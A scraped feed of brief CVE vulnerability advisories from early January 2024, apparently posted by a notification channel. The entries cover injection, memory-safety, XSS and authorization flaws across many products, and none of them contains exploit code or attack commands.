🚨 CVE-2023-24590A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service.This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2024-01-05 18:37:31 |
🚨 CVE-2023-51384In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.🎖@cveNotify |
|
| 2024-01-05 18:37:26 |
🚨 CVE-2023-39539AMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability.🎖@cveNotify |
|
| 2024-01-05 18:37:25 |
🚨 CVE-2023-48706Vim is a UNIX editor that, prior to version 9.0.2121, has a heap-use-after-free vulnerability. When executing a `:s` command for the very first time and using a sub-replace-special atom inside the substitution part, it is possible that the recursive `:s` call causes free-ing of memory which may later then be accessed by the initial `:s` command. The user must intentionally execute the payload and the whole process is a bit tricky to do since it seems to work only reliably for the very first :s command. It may also cause a crash of Vim. Version 9.0.2121 contains a fix for this issue.🎖@cveNotify |
|
| 2024-01-05 17:37:32 |
🚨 CVE-2023-51107A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon compute_color() of jquant2.c.🎖@cveNotify |
|
| 2024-01-05 17:37:26 |
🚨 CVE-2023-51106A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon pnm_binary_read_image() of load-pnm.c.🎖@cveNotify |
|
| 2024-01-05 17:37:25 |
🚨 CVE-2023-50332Improper authorization vulnerability exists in the User Management (/admin/users) page of GROWI versions prior to v6.0.6. If this vulnerability is exploited, a user may delete or suspend its own account without the user's intention.🎖@cveNotify |
|
| 2024-01-05 17:37:24 |
🚨 CVE-2021-38927IBM Aspera Console 3.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210322.🎖@cveNotify |
|
| 2024-01-05 17:07:25 |
🚨 CVE-2023-50470A cross-site scripting (XSS) vulnerability in the component admin_ Video.php of SeaCMS v12.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2024-01-05 17:07:24 |
🚨 CVE-2023-46987SeaCMS v12.9 was discovered to contain a remote code execution (RCE) vulnerability via the component /augap/adminip.php.🎖@cveNotify |
|
| 2024-01-05 16:37:25 |
🚨 CVE-2023-24805cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. If you use the Backend Error Handler (beh) to create an accessible network printer, this security vulnerability can cause remote code execution. `beh.c` contains the line `retval = system(cmdline) >> 8;` which calls the `system` command with the operand `cmdline`. `cmdline` contains multiple user controlled, unsanitized values. As a result an attacker with network access to the hosted print server can exploit this vulnerability to inject system commands which are executed in the context of the running server. This issue has been addressed in commit `8f2740357` and is expected to be bundled in the next release. Users are advised to upgrade when possible and to restrict access to network printers in the meantime.🎖@cveNotify |
|
| 2024-01-05 16:07:32 |
🚨 CVE-2023-7150A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-05 16:07:26 |
🚨 CVE-2023-51432Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2024-01-05 16:07:25 |
🚨 CVE-2023-52152mupnp/net/uri.c in mUPnP for C through 3.0.2 has an out-of-bounds read and application crash because it lacks a certain host length recalculation.🎖@cveNotify |
|
| 2024-01-05 16:07:24 |
🚨 CVE-2023-52081ffcss is a CLI interface to apply and configure Firefox CSS themes. Prior to 0.2.0, the function `lookupPreprocess()` is meant to apply some transformations to a string by disabling characters in the regex `[-_ .]`. However, due to the use of late Unicode normalization of type NFKD, it is possible to bypass that validation and re-introduce all the characters in the regex `[-_ .]`. The `lookupPreprocess()` can be easily bypassed with equivalent Unicode characters like U+FE4D (?), which would result in the omitted U+005F (_), for instance. The `lookupPreprocess()` function is only ever used to search for themes loosely (case insensitively, while ignoring dashes, underscores and dots), so the actual security impact is classified as low. This vulnerability is fixed in 0.2.0. There are no known workarounds.🎖@cveNotify |
|
| 2024-01-05 15:07:34 |
🚨 CVE-2023-7159A vulnerability was found in gopeak MasterLab up to 3.3.10. It has been declared as critical. Affected by this vulnerability is the function add/update of the file app/ctrl/admin/User.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249181 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-05 15:07:33 |
🚨 CVE-2023-7157A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179.🎖@cveNotify |
|
| 2024-01-05 15:07:28 |
🚨 CVE-2023-50445Shell Injection vulnerability GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7., allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module.🎖@cveNotify |
|
| 2024-01-05 15:07:27 |
🚨 CVE-2015-10127A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-05 14:37:45 |
🚨 CVE-2023-38599A logic issue was addressed with improved state management. This issue is fixed in Safari 16.6, watchOS 9.6, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A website may be able to track sensitive user information.🎖@cveNotify |
|
| 2024-01-05 14:37:44 |
🚨 CVE-2023-38611The issue was addressed with improved memory handling. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-05 14:37:43 |
🚨 CVE-2023-38600The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-05 14:37:40 |
🚨 CVE-2023-38595The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-05 14:37:39 |
🚨 CVE-2023-32393The issue was addressed with improved memory handling. This issue is fixed in watchOS 9.3, tvOS 16.3, macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-05 14:37:38 |
🚨 CVE-2023-38594The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-05 14:37:33 |
🚨 CVE-2023-32439A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5.1 and iPadOS 16.5.1, iOS 15.7.7 and iPadOS 15.7.7, macOS Ventura 13.4.1, Safari 16.5.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-01-05 14:37:32 |
🚨 CVE-2023-28204An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, Safari 16.5, iOS 16.5 and iPadOS 16.5. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-01-05 14:37:28 |
🚨 CVE-2021-31799In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.🎖@cveNotify |
|
| 2024-01-05 14:37:27 |
🚨 CVE-2020-35934The Advanced Access Manager plugin before 6.6.2 for WordPress displays the unfiltered user object (including all metadata) upon login via the REST API (aam/v1/authenticate or aam/v2/authenticate). This is a security problem if this object stores information that the user is not supposed to have (e.g., custom metadata added by a different plugin).🎖@cveNotify |
|
| 2024-01-05 14:37:26 |
🚨 CVE-2014-6059WordPress Advanced Access Manager Plugin before 2.8.2 has an Arbitrary File Overwrite Vulnerability🎖@cveNotify |
|
| 2024-01-05 12:37:38 |
🚨 CVE-2023-32879In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308064.🎖@cveNotify |
|
| 2024-01-05 12:37:32 |
🚨 CVE-2023-32878In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08307992.🎖@cveNotify |
|
| 2024-01-05 12:37:31 |
🚨 CVE-2023-32875In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08304217.🎖@cveNotify |
|
| 2024-01-05 12:37:30 |
🚨 CVE-2023-32874In Modem IMS Stack, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161803; Issue ID: MOLY01161803 (MSV-893).🎖@cveNotify |
|
| 2024-01-05 12:37:26 |
🚨 CVE-2023-32831In wlan driver, there is a possible PIN crack due to use of insufficiently random values. This could lead to local information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00325055; Issue ID: MSV-868.🎖@cveNotify |
|
| 2024-01-05 12:37:25 |
🚨 CVE-2023-49773Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes.This issue affects BCorp Shortcodes: from n/a through 0.23.🎖@cveNotify |
|
| 2024-01-05 12:07:38 |
🚨 CVE-2023-51502Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Stripe Payment Gateway.This issue affects WooCommerce Stripe Payment Gateway: from n/a through 7.6.1.🎖@cveNotify |
|
| 2024-01-05 12:07:32 |
🚨 CVE-2020-13879IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+214f heap-based out-of-bounds write.🎖@cveNotify |
|
| 2024-01-05 12:07:31 |
🚨 CVE-2024-22088Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled.🎖@cveNotify |
|
| 2024-01-05 12:07:30 |
🚨 CVE-2024-22087route in main.c in Pico HTTP Server in C through f3b69a6 has an sprintf stack-based buffer overflow via a long URI, leading to remote code execution.🎖@cveNotify |
|
| 2024-01-05 12:07:26 |
🚨 CVE-2023-52323PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, exploitable for a Manger attack.🎖@cveNotify |
|
| 2024-01-05 12:07:25 |
🚨 CVE-2024-22075Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.🎖@cveNotify |
|
| 2024-01-05 11:37:26 |
🚨 CVE-2023-52148Exposure of Sensitive Information to an Unauthorized Actor vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager.This issue affects Affiliates Manager: from n/a through 2.9.30.🎖@cveNotify |
|
| 2024-01-05 11:37:25 |
🚨 CVE-2022-46839Unrestricted Upload of File with Dangerous Type vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.7.1.🎖@cveNotify |
|
| 2024-01-05 11:37:24 |
🚨 CVE-2023-46589Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.🎖@cveNotify |
|
| 2024-01-05 10:37:32 |
🚨 CVE-2022-4904A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.🎖@cveNotify |
|
| 2024-01-05 10:37:25 |
🚨 CVE-2021-22939If the Node.js https API was used incorrectly and "undefined" was in passed for the "rejectUnauthorized" parameter, no error was returned and connections to servers with an expired certificate would have been accepted.🎖@cveNotify |
|
| 2024-01-05 10:37:24 |
🚨 CVE-2021-22931Node.js before 16.6.0, 14.17.4, and 12.22.4 is vulnerable to Remote Code Execution, XSS, Application crashes due to missing input validation of host names returned by Domain Name Servers in Node.js dns library which can lead to output of wrong hostnames (leading to Domain Hijacking) and injection vulnerabilities in applications using the library.🎖@cveNotify |
|
| 2024-01-05 09:37:31 |
🚨 CVE-2023-52136Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Custom Twitter Feeds – A Tweets Widget or X Feed Widget.This issue affects Custom Twitter Feeds – A Tweets Widget or X Feed Widget: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-01-05 09:37:30 |
🚨 CVE-2023-52129Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress.This issue affects teachPress: from n/a through 9.0.4.🎖@cveNotify |
|
| 2024-01-05 09:37:26 |
🚨 CVE-2023-52123Cross-Site Request Forgery (CSRF) vulnerability in WPChill Strong Testimonials.This issue affects Strong Testimonials: from n/a through 3.1.10.🎖@cveNotify |
|
| 2024-01-05 09:37:25 |
🚨 CVE-2020-13880IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+1cbf heap-based out-of-bounds write.🎖@cveNotify |
|
| 2024-01-05 08:37:29 |
🚨 CVE-2023-52184Cross-Site Request Forgery (CSRF) vulnerability in WP Job Portal WP Job Portal – A Complete Job Board.This issue affects WP Job Portal – A Complete Job Board: from n/a through 2.0.6.🎖@cveNotify |
|
| 2024-01-05 08:37:26 |
🚨 CVE-2023-52178Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MojofyWP WP Affiliate Disclosure allows Stored XSS.This issue affects WP Affiliate Disclosure: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-01-05 08:37:25 |
🚨 CVE-2023-51502Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Stripe Payment Gateway.This issue affects WooCommerce Stripe Payment Gateway: from n/a through 7.6.1.🎖@cveNotify |
|
| 2024-01-05 08:37:24 |
🚨 CVE-2020-13878IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+27ef heap-based out-of-bounds write.🎖@cveNotify |
|
| 2024-01-05 05:37:25 |
🚨 CVE-2023-51277nbviewer-app (aka Jupyter Notebook Viewer) before 0.1.6 has the get-task-allow entitlement for release builds.🎖@cveNotify |
|
| 2024-01-05 05:07:32 |
🚨 CVE-2023-51396Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS.This issue affects Brizy – Page Builder: from n/a through 2.4.29.🎖@cveNotify |
|
| 2024-01-05 05:07:26 |
🚨 CVE-2023-51374Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZeroBounce ZeroBounce Email Verification & Validation allows Stored XSS.This issue affects ZeroBounce Email Verification & Validation: from n/a through 1.0.11.🎖@cveNotify |
|
| 2024-01-05 05:07:25 |
🚨 CVE-2023-51371Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS.This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget: from n/a through 1.1.9.🎖@cveNotify |
|
| 2024-01-05 05:07:24 |
🚨 CVE-2023-51361Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ginger Plugins Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button allows Stored XSS.This issue affects Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button: from n/a through 1.1.8.🎖@cveNotify |
|
| 2024-01-05 04:37:25 |
🚨 CVE-2024-22087route in main.c in Pico HTTP Server in C through f3b69a6 has an sprintf stack-based buffer overflow via a long URI, leading to remote code execution.🎖@cveNotify |
|
| 2024-01-05 04:37:24 |
🚨 CVE-2023-52323PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, exploitable for a Manger attack.🎖@cveNotify |
|
| 2024-01-05 03:37:24 |
🚨 CVE-2024-22075Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.🎖@cveNotify |
|
| 2024-01-05 02:37:32 |
🚨 CVE-2024-0225Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-05 02:37:25 |
🚨 CVE-2023-7104A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999.🎖@cveNotify |
|
| 2024-01-05 02:37:24 |
🚨 CVE-2023-6879Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc().🎖@cveNotify |
|
| 2024-01-05 00:37:26 |
🚨 CVE-2023-50104ZZCMS 2023 has a file upload vulnerability in 3/E_bak5.1/upload/index.php, allowing attackers to exploit this loophole to gain server privileges and execute arbitrary code.🎖@cveNotify |
|
| 2024-01-05 00:37:25 |
🚨 CVE-2023-52084Winter is a free, open-source content management system. Prior to 1.2.4, Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be rendered unescaped in the backend form, potentially allowing for a stored XSS attack. This issue has been patched in v1.2.4.🎖@cveNotify |
|
| 2024-01-05 00:07:24 |
🚨 CVE-2023-7131A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-04 23:37:41 |
🚨 CVE-2023-52173XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3ADBD0.🎖@cveNotify |
|
| 2024-01-04 23:37:36 |
🚨 CVE-2023-23439Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak.🎖@cveNotify |
|
| 2024-01-04 23:37:35 |
🚨 CVE-2023-23437Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak🎖@cveNotify |
|
| 2024-01-04 23:37:31 |
🚨 CVE-2023-23430Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions.🎖@cveNotify |
|
| 2024-01-04 23:37:30 |
🚨 CVE-2023-23426Some Honor products are affected by file writing vulnerability, successful exploitation could cause information disclosure.🎖@cveNotify |
|
| 2024-01-04 23:37:25 |
🚨 CVE-2023-23432Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file.🎖@cveNotify |
|
| 2024-01-04 23:37:24 |
🚨 CVE-2023-52077Nexkey is a lightweight fork of Misskey v12 optimized for small to medium size servers. Prior to 12.23Q4.5, Nexkey allows external apps using tokens issued by administrators and moderators to call admin APIs. This allows malicious third-party apps to perform operations such as updating server settings, as well as compromise object storage and email server credentials. This issue has been patched in 12.23Q4.5.🎖@cveNotify |
|
| 2024-01-04 23:07:25 |
🚨 CVE-2023-23435Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file🎖@cveNotify |
|
| 2024-01-04 23:07:24 |
🚨 CVE-2023-23434Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak.🎖@cveNotify |
|
| 2024-01-04 22:37:24 |
🚨 CVE-2022-22995The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.🎖@cveNotify |
|
| 2024-01-04 22:07:24 |
🚨 CVE-2023-49229An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in the administration web service allows read-only, unprivileged users to obtain sensitive information about the device configuration.🎖@cveNotify |
|
| 2024-01-04 21:37:36 |
🚨 CVE-2024-22050Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs.🎖@cveNotify |
|
| 2024-01-04 21:37:35 |
🚨 CVE-2024-22049httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written.🎖@cveNotify |
|
| 2024-01-04 21:37:31 |
🚨 CVE-2024-22048govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.🎖@cveNotify |
|
| 2024-01-04 21:37:30 |
🚨 CVE-2023-46623Improper Control of Generation of Code ('Code Injection') vulnerability in TienCOP WP EXtra.This issue affects WP EXtra: from n/a through 6.2.🎖@cveNotify |
|
| 2024-01-04 21:37:25 |
🚨 CVE-2023-25054Improper Control of Generation of Code ('Code Injection') vulnerability in David F. Carr RSVPMaker.This issue affects RSVPMaker: from n/a through 10.6.6.🎖@cveNotify |
|
| 2024-01-04 21:37:24 |
🚨 CVE-2023-22677Improper Control of Generation of Code ('Code Injection') vulnerability in BinaryStash WP Booklet.This issue affects WP Booklet: from n/a through 2.1.8.🎖@cveNotify |
|
| 2024-01-04 20:07:25 |
🚨 CVE-2023-51501Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Undsgn Uncode - Creative & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Uncode - Creative & WooCommerce WordPress Theme: from n/a through 2.8.6.🎖@cveNotify |
|
| 2024-01-04 20:07:24 |
🚨 CVE-2023-50874Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Darren Cooney WordPress Infinite Scroll – Ajax Load More allows Stored XSS.This issue affects WordPress Infinite Scroll – Ajax Load More: from n/a through 6.1.0.1.🎖@cveNotify |
|
| 2024-01-04 19:07:43 |
🚨 CVE-2023-50862Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'hotelIDHidden' parameter of the booking.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 19:07:37 |
🚨 CVE-2023-50760Online Notice Board System v1.0 is vulnerable to an Insecure File Upload vulnerability on the 'f' parameter of user/update_profile_pic.php page, allowing an authenticated attacker to obtain Remote Code Execution on the server hosting the application.🎖@cveNotify |
|
| 2024-01-04 19:07:36 |
🚨 CVE-2023-51084hyavijava v6.0.07.1 was discovered to contain a stack overflow via the ResultConverter.convert2Xml method.🎖@cveNotify |
|
| 2024-01-04 19:07:32 |
🚨 CVE-2023-5939The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users.🎖@cveNotify |
|
| 2024-01-04 19:07:31 |
🚨 CVE-2023-5674The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.🎖@cveNotify |
|
| 2024-01-04 19:07:30 |
🚨 CVE-2023-48116SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment.🎖@cveNotify |
|
| 2024-01-04 19:07:26 |
🚨 CVE-2023-48114SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name.🎖@cveNotify |
|
| 2024-01-04 19:07:25 |
🚨 CVE-2023-0011A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands.Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well..This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280.🎖@cveNotify |
|
| 2024-01-04 18:37:24 |
🚨 CVE-2023-7047Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources.🎖@cveNotify |
|
| 2024-01-04 18:07:27 |
🚨 CVE-2023-45871An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.🎖@cveNotify |
|
| 2024-01-04 18:07:26 |
🚨 CVE-2023-39323Line directives ("//line") can be used to bypass the restrictions on "//go:cgo_" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running "go build". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.🎖@cveNotify |
|
| 2024-01-04 17:37:32 |
🚨 CVE-2023-49949Passwork before 6.2.0 allows remote authenticated users to bypass 2FA by sending all one million of the possible 6-digit codes.🎖@cveNotify |
|
| 2024-01-04 17:37:25 |
🚨 CVE-2023-42436Stored cross-site scripting vulnerability exists in the presentation feature of GROWI versions prior to v3.4.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.🎖@cveNotify |
|
| 2024-01-04 17:37:24 |
🚨 CVE-2023-50428In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023. NOTE: although this is a vulnerability from the perspective of the Bitcoin Knots project, some others consider it "not a bug."🎖@cveNotify |
|
| 2024-01-04 17:07:32 |
🚨 CVE-2023-51700Unofficial Mobile BankID Integration for WordPress lets users employ Mobile BankID to authenticate themselves on your WordPress site. Prior to 1.0.1, WP-Mobile-BankID-Integration is affected by a vulnerability classified as a Deserialization of Untrusted Data vulnerability, specifically impacting scenarios where an attacker can manipulate the database. If unauthorized actors gain access to the database, they could exploit this vulnerability to execute object injection attacks. This could lead to unauthorized code execution, data manipulation, or data exfiltration within the WordPress environment. Users of the plugin should upgrade to version 1.0.1 (or later), where the serialization and deserialization of OrderResponse objects have been switched out to an array stored as JSON. A possible workaround for users unable to upgrade immediately is to enforce stricter access controls on the database, ensuring that only trusted and authorized entities can modify data. Additionally, implementing monitoring tools to detect unusual database activities could help identify and mitigate potential exploitation attempts.🎖@cveNotify |
|
| 2024-01-04 17:07:26 |
🚨 CVE-2023-51664tj-actions/changed-files is a Github action to retrieve all files and directories. Prior to 41.0.0, the `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. This issue may lead to arbitrary command execution in the GitHub Runner. This vulnerability has been addressed in version 41.0.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-01-04 17:07:25 |
🚨 CVE-2023-7116A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-04 17:07:24 |
🚨 CVE-2023-4641A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.🎖@cveNotify |
|
| 2024-01-04 16:07:26 |
